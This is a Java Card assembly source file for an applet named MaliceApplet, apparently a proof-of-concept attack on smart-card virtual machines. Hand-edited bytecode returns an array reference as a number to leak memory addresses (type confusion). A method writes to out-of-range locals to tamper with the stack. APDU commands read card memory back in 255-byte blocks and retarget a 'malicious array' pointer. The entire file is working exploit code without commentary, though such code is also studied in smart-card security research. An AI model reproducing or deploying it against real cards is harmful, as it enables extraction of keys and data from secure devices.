// converted by version 1.3
// on Thu Jul 05 09:36:17 CEST 2018

.package malicepackage {
	.aid 0x10:0x2:0x3:0x4:0x5:0x6:0x7:0x8:0x9:0x0;
	.version 1.0;

	.imports {
		0xA0:0x0:0x0:0x0:0x62:0x1:0x1 1.3;		//javacard/framework
		0xA0:0x0:0x0:0x0:0x62:0x0:0x1 1.0;		//java/lang
	}

	.applet {
		0x10:0x2:0x3:0x4:0x5:0x6:0x7:0x8:0x9:0x0:0x0 MaliceApplet;
	}

	.constantPool {
		// 0
		instanceFieldRef byte[] MaliceApplet/codeD;
		// 1
		instanceFieldRef byte[] MaliceApplet/searchBuf;
		// 2
		instanceFieldRef byte[] MaliceApplet/MALICIOUS_ARRAY;
		// 3
		instanceFieldRef byte MaliceApplet/k;
		// 4
		staticMethodRef 0.3.0()V;		// javacard/framework/Applet.<init>()V
		// 5
		classRef MaliceApplet;
		// 6
		staticMethodRef MaliceApplet/<init>()V;
		// 7
		virtualMethodRef 0.3.1()V;		// register()V
		// 8
		virtualMethodRef 0.10.1()[B;		// getBuffer()[B
		// 9
		virtualMethodRef 0.3.3()Z;		// selectingApplet()Z
		// 10
		staticMethodRef 0.7.1(S)V;		// javacard/framework/ISOException.throwIt(S)V
		// 11
		virtualMethodRef MaliceApplet/getMyAdresstabByte([B)S;
		// 12
		staticMethodRef 0.16.6([BSS)S;		// javacard/framework/Util.setShort([BSS)S
		// 13
		virtualMethodRef 0.10.8(SS)V;		// setOutgoingAndSend(SS)V
		// 14
		virtualMethodRef 0.10.6()S;		// setIncomingAndReceive()S
		// 15
		virtualMethodRef MaliceApplet/Read([BLjavacard/framework/APDU;S)S;
			.descriptor	Ljavacard/framework/APDU;	0.10;

		// 16
		virtualMethodRef MaliceApplet/ModifyStack([BLjavacard/framework/APDU;S)V;
			.descriptor	Ljavacard/framework/APDU;	0.10;

	}

	.class public MaliceApplet 0 extends 0.3 {		// extends javacard/framework/Applet

		.fields {
			public byte k 0;		// B
			public byte[] codeD 1;		// [B
			public byte[] searchBuf 2;		// [B
			public byte[] MALICIOUS_ARRAY 3;		// [B
			public static final byte CLA_MALICEAPPLET = -64;		// B
			public static final byte INS_INI_CODED = 0;		// B
			public static final byte INS_GETMYADRESSBYTE = 1;		// B
			public static final byte INS_MODIF_CODED = 2;		// B
			public static final byte INS_MODIF_MAL = 5;		// B
			public static final byte INS_REPLACE = 10;		// B
			public static final byte INS_REPLACE_2 = 12;		// B
			public static final byte INS_SUPPR = 15;		// B
			public static byte[] find 0 = {17,105,-126,-115,0,11};		// [B
			public static byte result 1;		// B
		}

		.publicMethodTable 7 {
			equals(Ljava/lang/Object;)Z;
			register()V;
			register([BSB)V;
			selectingApplet()Z;
			deselect()V;
			getShareableInterfaceObject(Ljavacard/framework/AID;B)Ljavacard/framework/Shareable;;
			select()Z;
			process(Ljavacard/framework/APDU;)V;
			getMyAdresstabByte([B)S;
			ModifyStack([BLjavacard/framework/APDU;S)V;
			Read([BLjavacard/framework/APDU;S)S;
		}

		.packageMethodTable 0 {
		}

		.method private <init>()V {
			.stack 5;
			.locals 0;

				L0:	aload_0;
					invokespecial 4;		// javacard/framework/Applet.<init>()V
					aload_0;
					bspush 14;
					newarray 11;
					dup;
					bspush 10;
					bspush 125;
					bastore;
					dup;
					bspush 13;
					bspush 120;
					bastore;
					putfield_a 0;		// reference malicepackage/MaliceApplet.codeD
					aload_0;
					bspush 6;
					newarray 11;
					putfield_a 1;		// reference malicepackage/MaliceApplet.searchBuf
					aload_0;
					bspush 12;
					newarray 11;
					dup;
					bspush 8;
					bspush 125;
					bastore;
					dup;
					bspush 11;
					bspush 120;
					bastore;
					putfield_a 2;		// reference malicepackage/MaliceApplet.MALICIOUS_ARRAY
					aload_0;
					sconst_0;
					putfield_b 3;		// byte malicepackage/MaliceApplet.k
					return;
		}

		.method public static install([BSB)V 0 {
			.stack 2;
			.locals 0;

				L0:	new 5;		// malicepackage/MaliceApplet
					dup;
					invokespecial 6;		// malicepackage/MaliceApplet.<init>()V
					invokevirtual 7;		// register()V
					return;
		}

		.method public process(Ljavacard/framework/APDU;)V 7 {
			.stack 6;
			.locals 3;

			.descriptor	Ljavacard/framework/APDU;	0.10;

				L0:	aload_1;
					invokevirtual 8;		// getBuffer()[B
					astore_2;
					sconst_0;
					sstore_3;
					aload_0;
					invokevirtual 9;		// selectingApplet()Z
					ifeq L2;
				L1:	return;
				L2:	aload_2;
					sconst_0;
					baload;
					bspush -64;
					if_scmpeq L4;
				L3:	sspush 28160;
					invokestatic 10;		// javacard/framework/ISOException.throwIt(S)V
				L4:	aload_2;
					sconst_1;
					baload;
					stableswitch L22 0 15 L5 L6 L7 L22 L22 L14 L22 L22 L22 L22 L8 L22 L15 L22 L22 L21;
				L5:	getfield_a_this 0;		// reference malicepackage/MaliceApplet.codeD
					bspush 11;
					sconst_0;
					bastore;
					getfield_a_this 0;		// reference malicepackage/MaliceApplet.codeD
					bspush 12;
					sconst_0;
					bastore;
					goto_w L23;
				L6:	aload_2;
					sconst_0;
					aload_0;
					getfield_a_this 2;		// reference malicepackage/MaliceApplet.MALICIOUS_ARRAY
					invokevirtual 11;		// getMyAdresstabByte([B)S
					invokestatic 12;		// javacard/framework/Util.setShort([BSS)S
					pop;
					aload_1;
					sconst_0;
					sconst_2;
					invokevirtual 13;		// setOutgoingAndSend(SS)V
					goto_w L23;
				L7:	aload_1;
					invokevirtual 14;		// setIncomingAndReceive()S
					pop;
					getfield_a_this 0;		// reference malicepackage/MaliceApplet.codeD
					bspush 11;
					aload_2;
					sconst_5;
					baload;
					bastore;
					getfield_a_this 0;		// reference malicepackage/MaliceApplet.codeD
					bspush 12;
					aload_2;
					bspush 6;
					baload;
					bastore;
					goto_w L23;
				L8:	sconst_0;
					sstore 4;
					goto L12;
				L9:	sinc 3 1;
					sinc 3 1;
					sinc 3 1;
					getfield_a_this 0;		// reference malicepackage/MaliceApplet.codeD
					bspush 12;
					dup2;
					baload;
					sconst_1;
					sadd;
					s2b;
					bastore;
					getfield_a_this 0;		// reference malicepackage/MaliceApplet.codeD
					bspush 12;
					baload;
					ifne L11;
				L10:	getfield_a_this 0;		// reference malicepackage/MaliceApplet.codeD
					bspush 11;
					dup2;
					baload;
					sconst_1;
					sadd;
					s2b;
					bastore;
				L11:	sinc 4 1;
				L12:	sload 4;
					bspush 10;
					if_scmplt L9;
				L13:	goto_w L23;
				L14:	aload_1;
					invokevirtual 14;		// setIncomingAndReceive()S
					pop;
					getfield_a_this 2;		// reference malicepackage/MaliceApplet.MALICIOUS_ARRAY
					bspush 9;
					aload_2;
					sconst_5;
					baload;
					bastore;
					getfield_a_this 2;		// reference malicepackage/MaliceApplet.MALICIOUS_ARRAY
					bspush 10;
					aload_2;
					bspush 6;
					baload;
					bastore;
					goto L23;
				L15:	sconst_0;
					sstore 4;
					goto L19;
				L16:	aload_2;
					sload 4;
					aload_0;
					aload_2;
					aload_1;
					getfield_b_this 3;		// byte malicepackage/MaliceApplet.k
					invokevirtual 15;		// Read([BLjavacard/framework/APDU;S)S
					invokestatic 12;		// javacard/framework/Util.setShort([BSS)S
					pop;
					getfield_a_this 2;		// reference malicepackage/MaliceApplet.MALICIOUS_ARRAY
					bspush 10;
					getfield_a_this 2;		// reference malicepackage/MaliceApplet.MALICIOUS_ARRAY
					bspush 10;
					baload;
					sconst_2;
					sadd;
					s2b;
					bastore;
					getfield_a_this 2;		// reference malicepackage/MaliceApplet.MALICIOUS_ARRAY
					bspush 10;
					baload;
					ifne L18;
				L17:	getfield_a_this 2;		// reference malicepackage/MaliceApplet.MALICIOUS_ARRAY
					bspush 9;
					getfield_a_this 2;		// reference malicepackage/MaliceApplet.MALICIOUS_ARRAY
					bspush 9;
					baload;
					sconst_1;
					sadd;
					s2b;
					bastore;
				L18:	sinc 4 2;
				L19:	sload 4;
					sspush 255;
					if_scmplt L16;
				L20:	aload_1;
					sconst_0;
					sspush 255;
					invokevirtual 13;		// setOutgoingAndSend(SS)V
					goto L23;
				L21:	sinc 3 1;
					sinc 3 1;
					sinc 3 1;
					sinc 3 1;
					sinc 3 1;
					sinc 3 1;
					sinc 3 1;
					sinc 3 1;
					sinc 3 1;
					sinc 3 1;
					goto L23;
				L22:	sspush 27904;
					invokestatic 10;		// javacard/framework/ISOException.throwIt(S)V
				L23:	return;
		}

		.method public getMyAdresstabByte([B)S 8 {
			.stack 3;
			.locals 1;

				L0:	sspush 4590;
					sstore_2;
					aload_1;
					nop;
					nop;
					nop;
					nop;
					sreturn;
		}

		.method public ModifyStack([BLjavacard/framework/APDU;S)V 9 {
			.stack 2;
			.locals 2;

			.descriptor	Ljavacard/framework/APDU;	0.10;

				L0:	sspush 2570;
					sstore 4;
					aload_0;
					getfield_a_this 2;		// reference malicepackage/MaliceApplet.MALICIOUS_ARRAY
					invokevirtual 11;		// getMyAdresstabByte([B)S
					bspush 8;
					sadd;
					sstore 5;
					sload 5;
					sstore 6;
					return;
		}

		.method public Read([BLjavacard/framework/APDU;S)S 10 {
			.stack 4;
			.locals 0;

			.descriptor	Ljavacard/framework/APDU;	0.10;

				L0:	aload_0;
					aload_1;
					aload_2;
					sload_3;
					invokevirtual 16;		// ModifyStack([BLjavacard/framework/APDU;S)V
					sconst_0;
					sreturn;
		}

	}

}
